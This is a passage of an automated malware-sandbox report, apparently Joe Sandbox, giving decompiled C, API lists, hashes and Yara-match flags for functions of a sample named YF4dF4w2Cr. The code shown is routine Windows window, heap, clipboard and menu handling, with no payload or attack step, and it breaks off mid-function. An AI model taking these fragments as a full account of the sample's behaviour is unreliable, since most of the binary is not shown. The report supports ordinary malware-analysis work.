                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: State$LongWindow
                  • String ID:
                  • API String ID: 3716621309-0
                  • Opcode ID: a033a21157c47fbfa0e24a96ae4442311d1884c59477a4a71bd33de05f0dab1f
                  • Instruction ID: eb29b69587276a4c87bc497b15f26f710776b5dba471491bf800b7c54aafd883
                  • Opcode Fuzzy Hash: a033a21157c47fbfa0e24a96ae4442311d1884c59477a4a71bd33de05f0dab1f
                  • Instruction Fuzzy Hash: 50F0C23270021A26EF216A66E840FAA6E19DFE0BE4F404037FD0496291DA79EE529658
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00409E32, Relevance: 3.0, APIs: 2, Instructions: 37windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00409E32(void* __ecx, intOrPtr _a4) {
				void* _t4;
				intOrPtr _t13;
				void* _t15;

				_t13 = _a4;
				_t15 = __ecx;
				if(_t13 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
						if(IsIconic( *(_t15 + 0x20)) != 0) {
							_t13 = 9;
						}
					} else {
						_t13 = 1;
					}
				}
				_t4 = E00408453(_t15, _t13);
				if(_t13 == 0xffffffff) {
					return _t4;
				}
				E00412C34(_t15, _t13);
				return E00408453(_t15, _t13);
			}






                  0x00409e39
                  0x00409e3c
                  0x00409e41
                  0x00409e4e
                  0x00409e60
                  0x00409e64
                  0x00409e64
                  0x00409e50
                  0x00409e52
                  0x00409e52
                  0x00409e4e
                  0x00409e68
                  0x00409e70
                  0x00409e85
                  0x00409e85
                  0x00409e75
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: IconicVisibleWindow
                  • String ID:
                  • API String ID: 1797901696-0
                  • Opcode ID: 4b89df06aeafc756f6f4c570c949171450a6465a5fa1ccc15aae3332874214a2
                  • Instruction ID: 00d28d6fd906408d5a587392a6d015049f0fc31bbb2550aa14c1424eab5ea1fc
                  • Opcode Fuzzy Hash: 4b89df06aeafc756f6f4c570c949171450a6465a5fa1ccc15aae3332874214a2
                  • Instruction Fuzzy Hash: 89F0823230051027CA20673BDC0891FB66DABD2BB4710423FF56DA22E2BE789C5281D9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023114F2, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,0231F000,02311A84,?,?,?,?,?,?,?,023110F5), ref: 023114F5
                  • RtlAllocateHeap.NTDLL(00000000), ref: 023114FC
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: 03f8a582c78657f137649e45028333436038fcf09cae9b587c140f8526ccd39f
                  • Instruction ID: 49d436cda53e0a06250e8af9f00e2c51b024c7f20af2e47c114c30faee5f407f
                  • Opcode Fuzzy Hash: 03f8a582c78657f137649e45028333436038fcf09cae9b587c140f8526ccd39f
                  • Instruction Fuzzy Hash: 7FA012F0C901005BDD2817F0A90DB093B1CB750301F010848F10186040DE70501C8720
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023137A9, Relevance: 1.7, APIs: 1, Instructions: 416COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: c26c94d935f1691186dde19e1c6e61457a645a782fba57a7411804cfd9dcd0a3
                  • Instruction ID: 629cc4bb4a741688f9d1c875b3abb57af5c999fd1462042d95355c922d15e293
                  • Opcode Fuzzy Hash: c26c94d935f1691186dde19e1c6e61457a645a782fba57a7411804cfd9dcd0a3
                  • Instruction Fuzzy Hash: F9023170911B608FC77ACF29C680662BBF1BF44A247605EAEC6E786E90D732F445CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043B152, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0043B152() {

				SetUnhandledExceptionFilter(E0043B110);
				return 0;
			}



                  0x0043b157
                  0x0043b15f

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(Function_0003B110), ref: 0043B157
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: d6db74126a095337b5804c22b45782424ac5f1438be7bfbcb22e81afeb1b7e49
                  • Instruction ID: 5b6281a5f520d4fb61d1f782fe85997edca4695b2f4a1162065385c2be311da9
                  • Opcode Fuzzy Hash: d6db74126a095337b5804c22b45782424ac5f1438be7bfbcb22e81afeb1b7e49
                  • Instruction Fuzzy Hash: CF900264651505468F0017725D1E7052694FA5D642F5158B1E221C4196DB944000555A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F30E8, Relevance: .4, Instructions: 416COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 10b6d93c7cdd72f921876a73e468b75597610690c8c285b60f195085938d1374
                  • Instruction ID: c75495901c9492854ffef2c4eba76b4edb8f28e781fa8d4e775f926aa5259a1c
                  • Opcode Fuzzy Hash: 10b6d93c7cdd72f921876a73e468b75597610690c8c285b60f195085938d1374
                  • Instruction Fuzzy Hash: FB026530521B918FC7B6CF69C680666F7F0BF846247205A6EC6E786EA4D732F845CB14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00432E86, Relevance: .4, Instructions: 384COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction ID: 0c11265734d30500f283200ed9b7eb3c936d71cde1608a088d3186bcf45d338d
                  • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                  • Instruction Fuzzy Hash: DED1AF73C0E9B34A8B35852D455813BFA626FE578172ED3E28CE03F38EC26A9D0595D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00432A66, Relevance: .4, Instructions: 378COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction ID: c2c71cbb4637e473741d3b1985c8c385a202cdbb69acbbe02834add265deea62
                  • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                  • Instruction Fuzzy Hash: BFD18D73C0E9B34A8B35852D466822FFA626FE578072ED3E28CE43F39DD16A5D0185D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0043265A, Relevance: .4, Instructions: 361COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction ID: e35bf5eaf1397fb288439c72cfc3b1d36aa2a9c2b85753906dea982f5e48199b
                  • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                  • Instruction Fuzzy Hash: 92C19073C0E9B34A8735812D466422BFA626FE579071FD3E28CE43F38E82AA5D0195D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00432286, Relevance: .4, Instructions: 351COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction ID: e6bca40f919b92fc655d71fc7f9890b759ba6e90e5fda41a678eacb09766bcf4
                  • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                  • Instruction Fuzzy Hash: 61C18073D0E9B34A8735812D466812FFA626FE578072ED3E28CE43F38ED16A5D0196D4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023137A5, Relevance: .2, Instructions: 239COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5a04d8b82dc1bdd0ddf315f3a90db5af59d0db8c8b57ad7b7b2e070a8bb893f0
                  • Instruction ID: 2f8572cea4d92692efe4d747c47bdcaa09028def73a60f737bab5e408a06b71f
                  • Opcode Fuzzy Hash: 5a04d8b82dc1bdd0ddf315f3a90db5af59d0db8c8b57ad7b7b2e070a8bb893f0
                  • Instruction Fuzzy Hash: EEA13070910B508FC739CF29C684666BBF5BF44624B505AAEC6E786E90D731F885CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F30E4, Relevance: .2, Instructions: 239COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce2a1a0e8d989b7204f3f160ccbc0b184bf6094f11bf8e8c688793db281b5268
                  • Instruction ID: e4b639a7a20d7afbac6cb89b6d93ada0fea79bbc13b64b2b4430ff96ad4e327c
                  • Opcode Fuzzy Hash: ce2a1a0e8d989b7204f3f160ccbc0b184bf6094f11bf8e8c688793db281b5268
                  • Instruction Fuzzy Hash: 78A14230920B918FC7B5CFA9C680667F7F4BF44624B105A6EC6A786AA4D771F885CB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F0467, Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: 761dff90568fdbfff66619c32d0fff93acb7ab1a0d5dd79d2a12076d7edbbe89
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: DA31A03661434A8FC750DF58D480A2AF7E4FF88308F4509BDEA958731BD370EA068B91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 023112CD, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: b43c585d22a56dec82a753d6957df8566bde2504ebc51dec166c93d1aa177f6f
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 25E0E6337215518BD73DDA99C480996F3B9EB84670B290879D6CED7A11C324BC02CE90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F0C0C, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: 96bb53f149c027d8138e004b4b6a609a2b3fe45051f28afc174d1e55d096efe9
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 34E08633330511CBC7A0DAD5D880965F3B5EB846707190879D746D3A0AC364BD05D740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401AF0, Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d066225cf355ea081255d090b5d8f0af9ab1788191efed86126529aafbb94d05
                  • Instruction ID: c8adc5ccf16261ec5d31fbc12676845fb7cbd01a58cf37860a19b5389e3966a9
                  • Opcode Fuzzy Hash: d066225cf355ea081255d090b5d8f0af9ab1788191efed86126529aafbb94d05
                  • Instruction Fuzzy Hash: 61B092B111A940CBC206DB08D480A44B3E4A708600F10091CE086C3A00C32494008A01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02311E04, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 022F1743, Relevance: .0, Instructions: 3COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.646499888.00000000022F0000.00000040.00000001.sdmp, Offset: 022F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_22f0000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00430191, Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 45registryclipboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00430191(intOrPtr* __ecx) {
				intOrPtr* _t26;

				_t26 = __ecx;
				 *_t26 = RegisterClipboardFormatA("Native");
				 *((intOrPtr*)(_t26 + 4)) = RegisterClipboardFormatA("OwnerLink");
				 *((intOrPtr*)(_t26 + 8)) = RegisterClipboardFormatA("ObjectLink");
				 *((intOrPtr*)(_t26 + 0xc)) = RegisterClipboardFormatA("Embedded Object");
				 *((intOrPtr*)(_t26 + 0x10)) = RegisterClipboardFormatA("Embed Source");
				 *((intOrPtr*)(_t26 + 0x14)) = RegisterClipboardFormatA("Link Source");
				 *((intOrPtr*)(_t26 + 0x18)) = RegisterClipboardFormatA("Object Descriptor");
				 *((intOrPtr*)(_t26 + 0x1c)) = RegisterClipboardFormatA("Link Source Descriptor");
				 *((intOrPtr*)(_t26 + 0x20)) = RegisterClipboardFormatA("FileName");
				 *((intOrPtr*)(_t26 + 0x24)) = RegisterClipboardFormatA("FileNameW");
				 *((intOrPtr*)(_t26 + 0x28)) = RegisterClipboardFormatA("Rich Text Format");
				 *((intOrPtr*)(_t26 + 0x2c)) = RegisterClipboardFormatA("RichEdit Text and Objects");
				return _t26;
			}




                  0x004301a0
                  0x004301a9
                  0x004301b2
                  0x004301bc
                  0x004301c6
                  0x004301d0
                  0x004301da
                  0x004301e4
                  0x004301ee
                  0x004301f8
                  0x00430202
                  0x0043020c
                  0x00430211
                  0x00430218

                  APIs
                  • RegisterClipboardFormatA.USER32 ref: 004301A2
                  • RegisterClipboardFormatA.USER32 ref: 004301AB
                  • RegisterClipboardFormatA.USER32 ref: 004301B5
                  • RegisterClipboardFormatA.USER32 ref: 004301BF
                  • RegisterClipboardFormatA.USER32 ref: 004301C9
                  • RegisterClipboardFormatA.USER32 ref: 004301D3
                  • RegisterClipboardFormatA.USER32 ref: 004301DD
                  • RegisterClipboardFormatA.USER32 ref: 004301E7
                  • RegisterClipboardFormatA.USER32 ref: 004301F1
                  • RegisterClipboardFormatA.USER32 ref: 004301FB
                  • RegisterClipboardFormatA.USER32 ref: 00430205
                  • RegisterClipboardFormatA.USER32 ref: 0043020F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                  • API String ID: 1228543026-2889995556
                  • Opcode ID: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction ID: 7eabd4f5f4dbb38bd0e4f7e30e0aa98beb580e07856e0c8e74aebad56863afda
                  • Opcode Fuzzy Hash: fe36e97890d272e0b85133efa5dbb91bef24085a6194f4f7bdb9aff7e4589271
                  • Instruction Fuzzy Hash: 2501E174E41B55B6C7106F729C1D91A7EA1FE447617604927A41C87641DBBCE054CFC8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041F7ED, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 401windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E0041F7ED(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				int _t200;
				intOrPtr _t208;
				intOrPtr* _t216;
				signed char _t224;
				signed char _t231;
				long _t266;
				long _t267;
				long _t313;
				long _t320;
				intOrPtr _t330;
				intOrPtr _t388;
				intOrPtr _t390;
				intOrPtr _t392;
				int _t393;
				intOrPtr* _t399;
				void* _t400;
				void* _t403;

				_t403 = __eflags;
				_t388 = __edx;
				E00431A9B(E0044BE41, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t400 - 0x34)) = __ecx;
				E00406039(__ebx, _t400 - 0x30, __edx, __edi, __esi, _t403);
				_t390 =  *((intOrPtr*)(_t400 + 8));
				 *((intOrPtr*)(_t400 - 4)) = 0;
				_t399 = E00422D89(0, _t400 - 0x30, _t390, __esi, _t403,  *((intOrPtr*)(_t390 + 0x18)));
				 *((intOrPtr*)(_t400 - 0x50)) =  *((intOrPtr*)( *_t399 + 0x1c))(0x44f0f5, 0xac);
				E00431160(_t390, _t400 - 0xb8, 0, 0x30);
				 *(_t400 - 0xb8) = 0x30;
				 *((intOrPtr*)(_t400 - 0xb4)) = 0x40;
				 *(_t400 - 0x18) = 0;
				if(GetMenuItemInfoA( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8) != 0) {
					_t330 = E004014F0(_t400 - 0x30,  *((intOrPtr*)(_t400 - 0x90)));
					 *((intOrPtr*)(_t400 - 0x90)) =  *((intOrPtr*)(_t400 - 0x90)) + 1;
					 *((intOrPtr*)(_t400 - 0x94)) = _t330;
					 *(_t400 - 0x18) = GetMenuItemInfoA( *( *((intOrPtr*)(_t400 - 0x34)) + 4),  *(_t390 + 8), 0, _t400 - 0xb8);
					E0040A356(_t400 - 0x30, 0xffffffff);
				}
				 *((intOrPtr*)(_t400 - 0x38)) =  *((intOrPtr*)(_t390 + 0x2c));
				E00413342(_t400 - 0x78, _t390 + 0x1c);
				_t392 =  *((intOrPtr*)(_t400 - 0x38));
				if(_t392 == 0 || E0041E99D(_t392, ?str?) == 0) {
					 *(_t400 - 0x3c) = 0;
					_t393 = GetSystemMetrics(0x32);
					_t200 = GetSystemMetrics(0x31);
				} else {
					 *(_t400 - 0x3c) = 1;
					GetObjectA( *(_t392 + 4), 0x18, _t400 - 0x68);
					_t393 =  *((intOrPtr*)(_t400 - 0x60));
					_t200 =  *(_t400 - 0x64);
				}
				 *(_t400 - 0x1c) = _t200;
				asm("cdq");
				asm("cdq");
				_t208 = ( *((intOrPtr*)(_t400 - 0x6c)) -  *((intOrPtr*)(_t400 - 0x74)) - _t388 >> 1) - (_t393 - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x74)) - 1;
				 *((intOrPtr*)(_t400 - 0x20)) = _t393 + 1 + _t208;
				 *((intOrPtr*)(_t400 - 0x28)) = _t208;
				 *(_t400 - 0x2c) = 0;
				 *((intOrPtr*)(_t400 - 0x24)) =  *(_t400 - 0x1c) + 1;
				 *(_t400 - 0x1c) = GetSysColor(4);
				E00422859(_t400 - 0x88);
				 *((char*)(_t400 - 4)) = 1;
				E0040876B(_t400 - 0x88, 0);
				 *((intOrPtr*)( *_t399 + 0x28))( *((intOrPtr*)(_t400 - 0x34)) + 8);
				_t216 = E0040BD78(_t399, _t400 - 0x14, _t400 - 0x30);
				 *((intOrPtr*)(_t400 - 0x40)) =  *((intOrPtr*)(_t216 + 4));
				_t218 =  *((intOrPtr*)(_t400 + 8));
				 *((intOrPtr*)(_t400 - 0x44)) =  *_t216;
				if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000001) == 0) {
					E00423E9D(_t399, _t218 + 0x1c,  *(_t400 - 0x1c));
					 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
					_t224 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
					__eflags = _t224 & 0x00000002;
					if((_t224 & 0x00000002) == 0) {
						__eflags =  *(_t400 - 0x3c);
						if( *(_t400 - 0x3c) != 0) {
							__eflags = _t224 & 0x00000008;
							if((_t224 & 0x00000008) != 0) {
								 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
								 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
								_t266 = GetSysColor(0x14);
								_t267 = GetSysColor(0x10);
								__eflags =  *((intOrPtr*)(_t400 - 0x34)) + 1;
								E00424022(_t399,  *((intOrPtr*)(_t400 - 0x34)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x34)) + 1,  *((intOrPtr*)(_t400 - 0x10)) + 1, _t267, _t266);
							}
						}
						__eflags =  *(_t400 - 0x18);
						if(__eflags == 0) {
							goto L25;
						} else {
							 *((intOrPtr*)( *_t399 + 0x2c))( *(_t400 - 0x1c));
							 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
							 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(7));
							goto L23;
						}
					}
					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
